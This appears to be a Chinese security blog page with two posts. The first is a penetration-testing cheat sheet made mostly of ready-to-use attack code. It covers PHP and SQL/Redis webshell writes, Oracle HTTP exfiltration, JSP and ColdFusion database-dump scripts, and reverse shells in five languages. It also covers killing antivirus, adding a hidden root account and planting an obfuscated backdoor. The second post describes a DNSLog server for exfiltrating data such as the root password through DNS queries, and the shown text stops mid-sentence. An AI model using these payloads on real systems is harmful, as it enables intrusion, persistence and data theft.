渗透常用代码

12月 31 2016 安全技术 6 分钟读完 (约 829 字)

PHP相关

<?php copy("http://x.x.x.x/shell.txt", "d:\www\shell.php"); ?>

<?php include "$_GET['_']"; ?>

<?php assert($_POST["1"]);?>

<?php
$url = "http://x.x.x.x/shell.txt";
$contents = file_get_contents($url);
echo $contents;
?>

Mysql数据库
phpmyadmin爆路径

1	http://url/phpMyAdmin/libraries/select_lang.lib.php

SQL语句导出shell:

1	select "<?php eval($_POST['1']);?>" into outfile 'C:\www\shell.php';

Redis数据库
写shell:

config set dir D:\www
config set dbfilename shell.php
set webshell "<?php eval($_POST[x]);?>"
save

Oracle数据库
查数据库ip

1	select sys_context('userenv','ip_address') from dual

通过外连回传数据

1	SELECT UTL_HTTP.request('http://target.com/getdata?data='\|\|TABLE_NAME) FROM USER_TABLES WHERE ROWNUM<=1

查询所有表

1	SELECT * FROM ALL_TABLES

查询当前用户表

1	select table_name from user_tables;

查询所有表按大小排序

1 2	SELECT TABLE_NAME,NUM_ROWS FROM ALL_TABLES order by NUM_ROWS desc select table_name,NUM_ROWS from user_tables order by NUM_ROWS desc

查询表前十条

1	select * from users where rownum < 10

分页查询 2000000 到 4000000

1	SELECT * FROM (SELECT e.,ROWNUM rn FROM (select from user ) e WHERE ROWNUM <= 4000000) WHERE rn > 2000000

查询当前编码

1	select userenv('language') from dual;

命令行执行

1	export NLS_LANG="american_america.AL32UTF8"

拖库脚本

JSP1

<%@ page contentType="text/html;charset=UTF-8"%>
<%@ page import="java.io.*,java.lang.*,java.sql.*"%>
<%
Class.forName("oracle.jdbc.driver.OracleDriver");
Connection conn = DriverManager.getConnection("jdbc:oracle:thin:@172.0.0.1:1521:orabi", "admin", "admin");
File f = new File("/webapps/ROOT/css/t1.txt");
BufferedWriter bw = new BufferedWriter(new FileWriter(f));
Statement stmt=conn.createStatement(ResultSet.TYPE_SCROLL_SENSITIVE,ResultSet.CONCUR_UPDATABLE);
ResultSet rs=stmt.executeQuery("select * from member where rownum > 2000000");
ResultSetMetaData rsmd = rs.getMetaData();
int numberOfColumns = rsmd.getColumnCount();
for(int i=1;i<numberOfColumns+1;i++){
    bw.write(rsmd.getColumnName(i)+",");
}
while (rs.next()){
    for(int i=1;i<numberOfColumns+1;i++){
        bw.write(rs.getString(i)+",");
    }
    bw.newLine();
    bw.flush();
}
out.print(rs);   
%>

JSP2

<%@ page contentType="text/html;charset=UTF-8"%>
<%@ page import="java.io.*,java.lang.*,java.sql.*"%>
<%
Class.forName("oracle.jdbc.driver.OracleDriver");
Connection conn = DriverManager.getConnection("jdbc:oracle:thin:@127.0.0.1:1521", "admin", "password");
Statement stmt=conn.createStatement(ResultSet.TYPE_SCROLL_SENSITIVE,ResultSet.CONCUR_UPDATABLE);
String html="";
File file = new File("/tmp/data.txt");
BufferedReader br = new BufferedReader(new FileReader(file));
String line;
while ((line = br.readLine()) != null) {
    html=html+"<h3>"+line+":</h3><table border=1><tr>";
    ResultSet rs=stmt.executeQuery("select * from "+line+" where rownum < 100");
    ResultSetMetaData rsmd = rs.getMetaData();
    int numberOfColumns = rsmd.getColumnCount();
    for(int i=1;i<numberOfColumns+1;i++){
        html=html+"<th>"+rsmd.getColumnName(i)+"</th>";
    }
    html+="</tr>";
    while (rs.next()){
        html+="<tr>";
        for(int i=1;i<numberOfColumns+1;i++){
            html=html+"<td>"+rs.getString(i)+"</td>";
        }
        html+="</tr>";
    }
    rs.close();
    html+="<tr></table>";
}
    File f = new File("/tmp/info.css");
    BufferedWriter bw = new BufferedWriter(new FileWriter(f));
    bw.write(html);
    bw.close();
    br.close();
    stmt.close();
    conn.close();
%>

ColdFusion

<CFSET USERNAME="user">
<CFSET PASSWORD="pass">
<CFSET DATABASE="ya_db">
<CFTRY>
<CFQUERY NAME="DATA" DATASOURCE=#DATABASE# USERNAME=#USERNAME# PASSWORD=#PASSWORD#>
SELECT * FROM MEMBER
</CFQUERY>
<CFCATCH Type="Any"></CFCATCH>
</CFTRY>
<CFSAVECONTENT variable="Dump_DATA">
<CFDUMP var="#DATA#" EXPAND="YES" FORMAT="TEXT">
</CFSAVECONTENT>
<cffile action="write" output="#Dump_DATA#" FILE="C:\\RECYCLER\\#USERNAME#_DATA.txt">

反弹shell
bash

1	bash -i >& /dev/tcp/1.1.1.1/1234 0>&1

1	rm -f /tmp/p; mknod /tmp/p p && telnet 1.1.1.1 1234 0/tmp/p

ruby

1	ruby -rsocket -e'f=TCPSocket.open("1.1.1.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

perl

perl -e 'use Socket;$i="1.1.1.1";
$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"))
if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");
open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

python

python -c 'import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("1.1.1.1",1234));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);'

php

1	php -r '$sock=fsockopen("1.1.1.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

Windows取消共享文件夹安全警告

1 2	@echo off Reg add HKCU\Software\Microsoft\Windows\CurrentVersion\PolicIEs\Associations /v LowRiskFileTypes /t REG_SZ /d .exe;.reg;.msi;.bat;.cmd;.com;.vbs;.hta;.scr;.pif;.js;.lnk; /f

kill安全狗3.x

1	ntsd -c q -pn SafeDogGuardCenter.exe

其他
python Simple HTTP服务：

1	python -m SimpleHTTPServer

Linux相关技巧
压缩目录

1
2
3

zip  -r  root.zip  /root/*
tar -czvf root.tar.gz /root/
tar -cvf  user/tmp/ooouser.tar  user/  --exclude=image --exclude= --exclude *.jpg --exclude *.gif  --exclude *.zip  --exclude *.bmp  --exclude *.eps --exclude *.psd

添加用户并设置密码

1	useradd -p `openssl passwd -1 -salt 'lsof' admin` -u 0 -o -g root -G root -s /bin/bash -d /usr/bin/lsof lsof

收集所有.sh .pl .py .conf .cnf .ini .*history .pass (/usr/share目录里面的除外) 并打包成zip

1	find / \! -path “/usr/share/” -regex “.\.sh$\\|.\.pl$\\|.\.py$\\|.\.conf$\\|.\.cnf$\\|.\.ini$\\|.\/\..history$\\|.\/\..pass.” -print\|zip pack.zip -@

array_push 后门

1	array_map("ass\x65rt",(array)$_REQUEST['array']);

开启3389端口

1	REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

如何低成本搭建dnslog服务器

12月 31 2016 安全技术 11 分钟读完 (约 1576 字)

DNSLog，简单来说，就是通过记录对于域名的DNS请求，通过dns请求这个相对“隐蔽”的渠道，来委婉地获取到想要获得的信息。
例如，在一个针对mysql数据库的注入中，如果没有回显，可能很多时候就要歇菜。
但如果对方的数据库服务器连接公网并且是Windows机器的话，就可以用这种姿势来获取信息：

1	SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM user WHERE user='root' LIMIT 1),'.nogan.ga\\xxx'))

你将会看到类似：

当然你可能会说直接用http协议传输不就好了吗，确实http协议也可以，但是http协议毕竟有局限的地方，例如容易被防火墙限制等。
而dns作为一种基础协议有时候并不会被随便禁用，一些内网当中对于DNS协议的管控和检测是个薄弱的点，相对http来说DNS协议也更加隐蔽。

近几年DNSLog被尤其广泛地运用于无回显的SQL注入、命令执行、XML实体注入等漏洞的检测当中，算是一门很基础的老技术了。

关于DNSLog的具体应用，这里就不多说了，感兴趣的可以进一步阅读以下文章：

https://www.anquanke.com/post/id/98096

http://www.freebuf.com/column/158579.html

https://www.cnblogs.com/afanti/p/8047530.html

那么如何低成本搭建dnslog服务器？接下来就来简要分享一个低成本构建DNSLog服务的方法。

准备材料：

(1) 一台低成本的VPS：这里推荐使用某国外的便宜VPS，完整root权限，单核512MB/10GSSD，￥128/年，购买链接在文章最后
(2) 一个可以接收邮件的邮箱：用来注册免费域名

搭建过程

注册域名

首先到 https://freenom.com 注册用户，同时注册一个免费的域名
以我这里为例，注册一个nogan.ga

注册的时候，在DNS选项中，选择使用自己的DNS，新建DNS服务器的地址，例如我这里自定义了两个dns服务器，分别是
ns0.nogan.ga和ns1.nogan.ga，并且将他们的地址指向我的VPS服务器。

点击Continue，进入到结算页面。
如果你上一步没有注册用户，那么可以直接在这里填你用来注册用户的邮箱，然后根据指引进行操作。
如果注册了用户，只需要直接登录就可以了。

进入到Review and Checkout页面，填入一些你的基本信息就可以了

这里记得勾选Lock profile，你的信息就不会被whois查询到了。

接着下一步，勾选Complate Order，域名就注册成功了。

部署DNS服务

登录你的VPS服务器，运行下面这个python脚本，将在你的VPS主机监听UDP 53端口，并且回复DNS响应包：

记得修改IP地址和NS域名，在最后。

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Date    : 2014-06-29 03:01:25
# @Author  : Your Name ([email protected])
# @Link    : http://example.org
# @Version : $Id$

import SocketServer
import struct
import socket as socketlib
# DNS Query
class SinDNSQuery:
    def __init__(self, data):
        i = 1
        self.name = ''
        while True:
            d = ord(data[i])
            if d == 0:
                break;
            if d < 32:
                self.name = self.name + '.'
            else:
                self.name = self.name + chr(d)
            i = i + 1
        self.querybytes = data[0:i + 1]
        (self.type, self.classify) = struct.unpack('>HH', data[i + 1:i + 5])
        self.len = i + 5
    def getbytes(self):
        return self.querybytes + struct.pack('>HH', self.type, self.classify)



# DNS Answer RRS
# this class is also can be use as Authority RRS or Additional RRS 
class SinDNSAnswer:
    def __init__(self, ip):
        self.name = 49164
        self.type = 1
        self.classify = 1
        self.timetolive = 190
        self.datalength = 4
        self.ip = ip

    def getbytes(self):
        res = struct.pack('>HHHLH', self.name, self.type, self.classify, self.timetolive, self.datalength)
        s = self.ip.split('.')
        res = res + struct.pack('BBBB', int(s[0]), int(s[1]), int(s[2]), int(s[3]))
        return res

# DNS frame
# must initialized by a DNS query frame
class SinDNSFrame:
    def __init__(self, data):
        (self.id, self.flags, self.quests, self.answers, self.author, self.addition) = struct.unpack('>HHHHHH', data[0:12])
        self.query = SinDNSQuery(data[12:])

    def getname(self):
        return self.query.name

    def setip(self, ip):
        self.answer = SinDNSAnswer(ip)
        self.answers = 1
        self.flags = 33152

    def getbytes(self):

        res = struct.pack('>HHHHHH', self.id, self.flags, self.quests, self.answers, self.author, self.addition)
        res = res + self.query.getbytes()
        if self.answers != 0:
            res = res + self.answer.getbytes()
        return res

# A UDPHandler to handle DNS query
class SinDNSUDPHandler(SocketServer.BaseRequestHandler):
    def handle(self):
        data = self.request[0].strip()
        dns = SinDNSFrame(data)
        socket = self.request[1]
        namemap = SinDNSServer.namemap
        if(dns.query.type==1):
            # If this is query a A record, then response it
            name = dns.getname();
            toip = None
            ifrom = "map"
            if namemap.__contains__(name):
                # If have record, response it
                # dns.setip(namemap[name])
                # socket.sendto(dns.getbytes(), self.client_address)
                toip = namemap[name]
            elif namemap.__contains__('*'):
                # Response default address
                # dns.setip(namemap['*'])
                # socket.sendto(dns.getbytes(), self.client_address)
                toip = namemap['*']
            else:
                # ignore it
                # socket.sendto(data, self.client_address)
                # socket.getaddrinfo(name,0)
                try:
                    toip = socketlib.getaddrinfo(name,0)[0][4][0]
                    ifrom = "sev"
                    # namemap[name] = toip
                    # print socket.getaddrinfo(name,0)
                except Exception, e:
                    print 'get ip fail'
            if toip:
                dns.setip(toip)

            print '%s: %s-->%s (%s)'%(self.client_address[0], name, toip, ifrom)
            socket.sendto(dns.getbytes(), self.client_address)
        else:
            # If this is not query a A record, ignore it
            socket.sendto(data, self.client_address)

# DNS Server
# It only support A record query
# user it, U can create a simple DNS server
class SinDNSServer:
    def __init__(self, port=53):
        SinDNSServer.namemap = {}
        self.port = port

    def addname(self, name, ip):
        SinDNSServer.namemap[name] = ip

    def start(self):
        HOST, PORT = "0.0.0.0", self.port
        server = SocketServer.UDPServer((HOST, PORT), SinDNSUDPHandler)
        server.serve_forever()

# Now, test it
if __name__ == "__main__":
    sev = SinDNSServer()
        sev.addname('ns0.nogan.ga','x.x.x.x') 
        sev.addname('ns1.nogan.ga','x.x.x.x')
        sev.addname('www.nogan.ga','y.y.y.y')
        sev.addname('*', '127.0.0.1') # default address

    sev.start() # start DNS server

将上面的ns0.nogan.ga和ns1.nogan.ga改成你的域名，并且将x.x.x.x改成你的VPS服务器地址。
如果你在搭建DNSLog的同时还想顺便搭建一个网站的话，可以添加一个www记录，指向你的web服务器地址。
星号是将任意地址执行127.0.0.1，这样你的DNSLog请求记录，都会被默认解析到127.0.0.1。

接着在服务器上运行